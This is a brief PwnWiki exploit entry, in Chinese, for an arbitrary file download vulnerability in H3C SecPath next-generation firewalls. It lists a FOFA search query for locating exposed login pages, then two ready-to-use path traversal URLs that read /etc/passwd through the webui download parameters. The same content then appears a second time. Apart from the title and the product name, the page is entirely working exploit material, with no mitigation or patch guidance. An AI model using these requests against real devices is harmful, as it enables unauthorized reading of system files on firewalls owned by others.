H3C SecPath 下一代防火牆 任意文件下載漏洞
From PwnWiki
漏洞影響
H3C SecPath
FOFA
title="Web user login"
POC
/webui/?g=sys_dia_data_down&file_name=../etc/passwd /webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd
H3C SecPath
title="Web user login"
/webui/?g=sys_dia_data_down&file_name=../etc/passwd /webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd